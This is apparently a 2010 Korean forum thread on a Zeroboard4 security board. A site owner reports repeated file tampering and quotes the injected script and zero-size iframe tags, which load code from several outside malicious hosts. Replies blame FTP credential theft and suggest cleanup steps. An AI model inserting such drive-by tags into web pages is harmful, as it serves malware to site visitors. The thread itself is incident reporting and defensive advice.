보안 정보 공유

제로보드4의 보안 취약점에 대한 정보와 패치 자료들을 공유하는 곳입니다.
제로보드4로 사이트를 운영하시는 분들의 많은 관심과 정보 공유 부탁드립니다.
보안 관련 내용이 아닌 경우 삭제될 수 있습니다.

글 수 133

또 공격시작이군요...

조회 수 6721 추천 수 0 2010.01.12 17:18:36
[레벨:3]고펑 *.142.122.37

html , php , js 파일내 다음과 같은 스크립트를 삽입하고 있습니다.

 

script language=javascript src=http://www.cancan.co.kr/1/ajax.js></script

 

script language=javascript src=http://116.125.127.141/swf/ajax.js></script

 

iframe src=http://116.125.127.141/include/index.asp width=0 height=0></iframe

 

script language=javascript src=http://116.125.127.141/swf/ajax.js></script

 

iframe src=http://121.124.124.72/help.asp width=0 height=0></iframe

 

document.write("<iframe width='0' height='0' src='http://116.125.127.141/include/index.asp'></iframe>");

 

document.write("<iframe width='0' height='0' src='http://sjappletree.net/log/help.asp'></iframe>");

 

document.write("<iframe width='0' height='0' src='http://210.118.78.27/help.asp'></iframe>");

 

 

 

어디가 뚫린지 알 수가 없어서 당황스럽습니다. 계속 모니터링하면서 변조된 파일을 다시 수정하고 또 털리고 또 수정하고 반복입니다..

 

이러다가 사이트를 닫아야되는게 아닌지 심히 걱정스럽습니다. ㅠ_ㅠ

 

 

이 게시물을...
엮인글 :
http://www.xpressengine.com/18608146/0b8/trackback
목록

[레벨:5]인터니즈2

2010.01.12 17:31:07
*.151.199.22

특정게시판 memo필드내에 삽입되는 인젝션공격이 아니라,

화일자체에 삽입되는 건가요?

profile

[레벨:15]misol

2010.01.13 01:17:56
*.34.48.183

어느곳엔가 외부에서 심어놓은 파일이 있지 않을까요? 계속 수정을 해도 계속 다시 심어진다면, 서버 내에 이미 외부에서 접근 가능하고 서버를 조정할 수 있는 해커가 심어놓은 파일이 있을 수도 있지 않나요?... (제로보드나 서비스용 파일 외에요.)

그리고 파이팅입니다! 고펑님!

[레벨:6]아빠불당

2010.01.13 23:05:22
*.109.150.201

이거는 ftp 해킹 입니다.

 

0. ftp 및 ssh 접속 정보를 모두 변경합니다.

1. 모든 감염파일을 처리합니다.

2. pc의 윈도를 최신으로 업글 합니다 (저는 이것 때문에 모든 pc를 정품 윈도로 바꿨습니다)

3. 강한 바이러스를 씁니다 (저는 카스퍼스키 인터넷을 씁니다. 체험판이나 개인용 알약으로는 텍도 없습니다)

 

기본만 지키면 해킹을 당하지 않습니다.

[레벨:6]아빠불당

2010.01.14 02:20:12
*.109.150.201

그런거를 ftp를 이용한 해킹이라고 하죠.

pc에 바이러스를 심고,

pc에서 ftp 프로그램을 정보를 빼내서 서버를 감염시키는 겁니다.

 

방어방법은 pc에 바이러스가 못 들어오게 하는것 입니다.

[레벨:6]아빠불당

2010.01.14 02:21:59
*.109.150.201

그리고, 서버의 전체 파일을 봐야 합니다.

이미지 디렉토리에 숨겨진 php 파일이나 js 파일들이 있으면

그것을 통해서 언제든지 backdoor로 들어올 수 있기 때문입니다.

 

몇번 당해보면,

1년에 몇만원하는 바이러스 프로그램 비용이 절대 안비싸다는 생각이 듭니다.

[레벨:1]브이빈

2010.01.26 14:46:18
*.72.67.186

우와 나랑 일촌인 분이다 :-) 요기서 보니 새롭습니다~

List of Articles
번호 제목 글쓴이 날짜 조회 수
공지 2010년 12월 22일 RFI 취약점 보안 패치 [1] XE Core 개발XE Developers 2010-12-22 8454
공지 보안 정보 공유 게시판 안내 [1] [레벨:30]zero 2009-09-11 7247
53 게시판 제목 계속되는 변조 방법이 없나요? [1] [레벨:1]석이.. 2010-04-03 1778
52 계속 뚫립니다. [레벨:0]김동하123 2010-04-03 1843
51 이것도 제로보드 해킹인가요? [2] [레벨:1]박지현403 2010-03-30 3657
50 인터니즈2님이 올리신 SQL인젝션 대응법.. [7] [레벨:2]박준규159 2010-03-17 2608
49 또 공격.... [3] [레벨:3]쥬시쿨 2010-03-06 2817
48 해킹인지 아니면 일시적인 오류인지 모르겠는데요... [1] [레벨:2]박준규159 2010-02-20 2479
47 (정보) html을 표준에 맞게 정리하고 스크립트실행을 방지시켜 주는 html purifier [레벨:1]상콤발랄보노군 2010-02-18 2085
46 제로보드4 관리자 세션을 이용한 CSRF 공격 대응 file [6] [레벨:30]zero 2010-02-11 5292
45 홈페이지 php파일이 모두 삭제... ㅡ,ㅡ [1] [레벨:6]아가페 2010-01-23 4532
44 config.php 파일을 외부에서 못 읽게 하기 [1] [레벨:6]아빠불당 2010-01-15 1350
43 SQL인젝션 공격시 대응법 [2] [레벨:5]인터니즈2 2010-01-12 4721
» 또 공격시작이군요... [7] [레벨:3]고펑 2010-01-12 6721
41 레볼루션 스킨... [4] [레벨:2]황현희839 2009-12-28 1332
40 FTP해킹으로 인해 페이지에 악성코드가 심어졌을 때 참조하십시요. file [2] [레벨:2]BRILLIANCE 2009-12-17 1726
39 게시판 덧글에 자꾸 이상한 글들이 생깁니다. file [4] [레벨:0]김우형406 2009-12-10 1254
38 악성코드 소스 그대로 모두 입력해 그런건지... [2] [레벨:17]제이엔지 2009-12-02 6877
37 중국헤킹발 ip 위치추적, 신분증위치추적등,웹호스팅서버내홈페이지수찾기등.. [레벨:1]태양370 2009-11-28 1692
36 비회원이 개인정보를 볼수있는 문제 해결책 [레벨:2]다크진 2009-11-25 5598
35 zb4pl8 해킹 취약점 보완에 관하여 질문드립니다. [1] [레벨:0]박태양569 2009-11-21 1187
34 최근에 SQL 인젝션 받으시는 분들 download.php 파일 수정하시기 바랍니다. [1] [레벨:2]Xian 2009-11-20 1707
목록
쓰기

알립니다